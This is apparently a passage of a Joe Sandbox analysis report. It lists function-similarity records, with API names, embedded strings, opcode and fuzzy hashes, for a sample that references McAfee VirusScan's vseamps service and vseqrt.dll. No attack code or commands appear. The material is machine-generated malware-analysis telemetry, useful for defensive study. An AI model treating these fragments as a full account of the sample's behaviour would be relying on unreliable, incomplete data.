                      • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                      • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                      • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                      • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterLeave$CloseCreateValue
                      • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                      • API String ID: 93015348-1041928032
                      • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                      • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                      • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                      • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                      • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                      • API String ID: 3682727354-300733478
                      • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                      • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                      • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                      • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                      • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                      • API String ID: 2587151837-1427723692
                      • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                      • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                      • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                      • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                      • String ID: SetDllDirectoryW$kernel32.dll
                      • API String ID: 3184163350-3826188083
                      • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                      • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                      • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                      • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Heap$AllocProcesslstrlen
                      • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                      • API String ID: 3424473247-996641649
                      • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                      • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                      • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                      • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: String$ByteCharMultiWide$ErrorLast
                      • String ID:
                      • API String ID: 1775797328-0
                      • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                      • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                      • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                      • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                      APIs
                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                      • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                      • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                      • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                      • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                      • String ID:
                      • API String ID: 1232609184-0
                      • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                      • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                      • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                      • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                      • String ID: H
                      • API String ID: 2107338056-2852464175
                      • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                      • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                      • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                      • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                      • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                      • API String ID: 1322048431-2685357988
                      • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                      • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                      • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                      • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterLeaveTimerWaitable
                      • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                      • API String ID: 2984211723-3002863673
                      • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                      • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                      • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                      • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CloseHandleMultipleObjectsOpenProcessWait
                      • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                      • API String ID: 678758403-4129911376
                      • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                      • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                      • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                      • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Heap$AllocProcesslstrlen
                      • String ID:
                      • API String ID: 3424473247-0
                      • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                      • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                      • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                      • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                      • String ID: bad exception$csm$csm$csm
                      • API String ID: 3766904988-820278400
                      • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                      • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                      • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                      • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                      • String ID:
                      • API String ID: 2707001247-0
                      • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                      • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                      • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                      • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                      • String ID: csm$csm$csm
                      • API String ID: 849930591-393685449
                      • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                      • Instruction ID: 7c0f182be558f4043920aa8c9cdb111cef053fd0ebc5122b4649e4fc2027255d
                      • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                      • Instruction Fuzzy Hash: 08D16D32A087428AEB249BADD4443AD7BA0FB457D8F940536EF8D57B96CF38E495C700
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Heap$FreeProcess
                      • String ID:
                      • API String ID: 3859560861-0
                      • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                      • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                      • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                      • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Heap$FreeProcess
                      • String ID:
                      • API String ID: 3859560861-0
                      • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                      • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                      • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                      • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: AddressFreeLibraryProc
                      • String ID: api-ms-$ext-ms-
                      • API String ID: 3013587201-537541572
                      • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                      • Instruction ID: 425c761f002239ad4534f60921b77c133a10664b3bb98e260972acf4425e9796
                      • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                      • Instruction Fuzzy Hash: 92411821B59A0251FA16CB9EE8206BE2795BF09BE0F998539DF0D87794DF3CE445C340
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                      • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                      • API String ID: 1119674940-1966266597
                      • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                      • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                      • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                      • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Heap$AllocProcesslstrlen$ComputerName
                      • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                      • API String ID: 3702919091-996641649
                      • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                      • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                      • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                      • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                      APIs
                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
